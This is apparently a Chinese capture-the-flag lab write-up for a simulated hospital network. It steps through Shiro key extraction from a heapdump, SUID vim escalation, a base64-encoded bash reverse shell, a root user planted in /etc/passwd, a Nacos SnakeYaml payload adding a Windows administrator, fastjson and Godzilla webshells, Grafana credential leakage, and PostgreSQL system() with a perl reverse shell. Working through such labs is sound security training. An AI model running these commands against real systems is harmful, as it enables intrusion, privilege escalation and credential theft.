春秋云境-Hostpital

内网攻防

外网打点

发现网页

dirsearch扫描

1
python3 dirsearch.py -u http://39.99.138.184:8080/

发现内存泄漏,dump下来

1
java -jar JDumpSpider-1.1-SNAPSHOT-full.jar heapdump

找到shiro的key

1
2
3
4
===========================================
CookieRememberMeManager(ShiroKey)
-------------
algMode = CBC, key = GAYysgMQhG7/CzIJlVpR2g==, algName = AES

找shiro框架利用工具

可以看到低权限

suid提权

find / -perm -u=s -type f 2>/dev/null

使用vim提权查看文件,此时必须有交互式shell才能查看,方便利用弹个shell

1
bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC94eC54eC54eC54eC8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}'
1
vim.basic /root/flag/flag01.txt

传个fscan扫一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
./fscan -h 172.30.12.0/24

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.4
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.30.12.5     is alive
(icmp) Target 172.30.12.6     is alive
(icmp) Target 172.30.12.236   is alive
[*] Icmp alive hosts len is: 3
172.30.12.236:8080 open
172.30.12.5:8080 open
172.30.12.6:445 open
172.30.12.6:139 open
172.30.12.6:135 open
172.30.12.236:22 open
172.30.12.5:22 open
172.30.12.6:8848 open
172.30.12.236:8009 open
[*] alive ports len is: 9
start vulscan
[*] NetInfo 
[*]172.30.12.6
   [->]Server02
   [->]172.30.12.6
[*] NetBios 172.30.12.6     WORKGROUP\SERVER02            
[*] WebTitle http://172.30.12.5:8080   code:302 len:0      title:None 跳转url: http://172.30.12.5:8080/login;jsessionid=719C12ACB9D4C848919679B06AB55529
[*] WebTitle http://172.30.12.5:8080/login;jsessionid=719C12ACB9D4C848919679B06AB55529 code:200 len:2005   title:医疗管理后台
[*] WebTitle http://172.30.12.236:8080 code:200 len:3964   title:医院后台管理平台
[*] WebTitle http://172.30.12.6:8848   code:404 len:431    title:HTTP Status 404 – Not Found
[+] PocScan http://172.30.12.6:8848 poc-yaml-alibaba-nacos 
[+] PocScan http://172.30.12.6:8848 poc-yaml-alibaba-nacos-v1-auth-bypass 
[+] PocScan http://172.30.12.5:8080 poc-yaml-spring-actuator-heapdump-file

当前权限太低了,这边写个公钥提升到root权限

1
2
3
4
5
vim.basic /etc/passwd                                       
i                                                           
hacker:$1$123$7mft0jKnzzvAdU4t0unTG1:0:0:/root:/bin/bash  #创建用户hacker/123456  
wq!                                                        
su hacker

扫出来内网是nacos,可以打SnakeYaml,把AwesomeScriptEngineFactory.java里执行的命令改成加个管理员用户

https://github.com/charonlight/NacosExploitGUI

1
2
Runtime.getRuntime().exec("net user calmsec qwer1234! /add");
Runtime.getRuntime().exec("net localgroup administrators calmsec /add")

1
2
javac src/artsploit/AwesomeScriptEngineFactory.java
jar -cvf yaml-payload.jar -C src/ .

然后把编译好的jar包传到被控机器的tmp目录下,之后在被控机器上搭建代理(注意后台启动),再起python服务,让内网的16去访问15的jar包

1
nohup ./linux_x64_agent -c 1.92.148.33:61032 -s aab32 &

被控机80起个服务

成功的话就可以直接rdp上去了

之后再看一下236的8080端口,burp抓一下

fastjson漏洞利用

发现json,猜测fastjson,测试了一下

拿到flag3

继续用插件注入🐎

上哥斯拉

发现54网段

弹shell到入口机器

1
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.30.12.5",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'

再搭一次代理,传fscan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
./fscan -h 172.30.54.179/24  
  
   ___                              _  
  / _ \     ___  ___ _ __ __ _  ___| | __  
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /  
/ /_\\_____\__ \ (__| | | (_| | (__|   <  
\____/     |___/\___|_|  \__,_|\___|_|\_\  
                     fscan version: 1.8.3  
start infoscan  
(icmp) Target 172.30.54.179   is alive  
(icmp) Target 172.30.54.12    is alive  
[*] Icmp alive hosts len is: 2  
172.30.54.179:8080 open  
172.30.54.12:22 open  
172.30.54.179:22 open  
172.30.54.12:5432 open  
172.30.54.12:3000 open  
172.30.54.179:8009 open  
[*] alive ports len is: 6  
start vulscan  
[*] WebTitle http://172.30.54.12:3000  code:302 len:29     title:None 跳转url: http://172.30.54.12:3000/login  
[*] WebTitle http://172.30.54.179:8080 code:200 len:3964   title:医院后台管理平台  
[*] WebTitle http://172.30.54.12:3000/login code:200 len:27909  title:Grafana  
已完成 4/6 [-] ssh 172.30.54.179:22 root root@111 ssh: handshake failed: ssh: un  
已完成 4/6 [-] ssh 172.30.54.179:22 root 1qaz2wsx ssh: handshake failed: ssh: un  
已完成 4/6 [-] ssh 172.30.54.12:22 root 1qaz!QAZ ssh: handshake failed: ssh: una  
已完成 4/6 [-] ssh 172.30.54.179:22 admin admin123 ssh: handshake failed: ssh: u  
已完成 4/6 [-] ssh 172.30.54.179:22 admin 1234567890 ssh: handshake failed: ssh:  
已完成 4/6 [-] ssh 172.30.54.179:22 admin 1q2w3e ssh: handshake failed: ssh: una  
已完成 6/6  
[*] 扫描结束,耗时: 6m48.2826514s

利用一下https://github.com/A-D-Team/grafanaExp,下载linux版本上传到受控机器上

1
2
3
4
5
6
7
8
9
10

Target vulnerable has plugin [alertlist]
Got secret_key [SW2YcwTIb9zpOOhoPsMm]
There is [0] records in db.
type:[postgres]     
name:[PostgreSQL]               
url:[localhost:5432]    
user:[postgres] password[Postgres@123]  
database:[postgres]     basic_auth_user:[] basic_auth_password:[]
All Done, have nice day!

数据库提权

扫出来数据库,连接一下

先改root密码

1
ALTER USER root WITH PASSWORD '123456';

此时哥斯拉弹出来的shell再监听4444端口

弹shell,psql也可以创建函数执行命令,缺点是没回显

1
2
3
4
CREATE OR REPLACE FUNCTION system (cstring) RETURNS integer AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT; select system('curl 172.30.54.179');

select system('perl -e \'use Socket;$i="172.30.54.179";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\'');

参考:https://tttang.com/archive/1547/#toc_0x06-postgresqlhttps://blog.csdn.net/qq_33020901/article/details/79032774

进入交互式shell

1
python3 -c 'import pty;pty.spawn("/bin/bash")'

直接连接输入 ?之后再输入!/bin/bash就可以到root权限了直接读flag文件

flag{be4c267d-e3be-482f-b03b-45bade888421}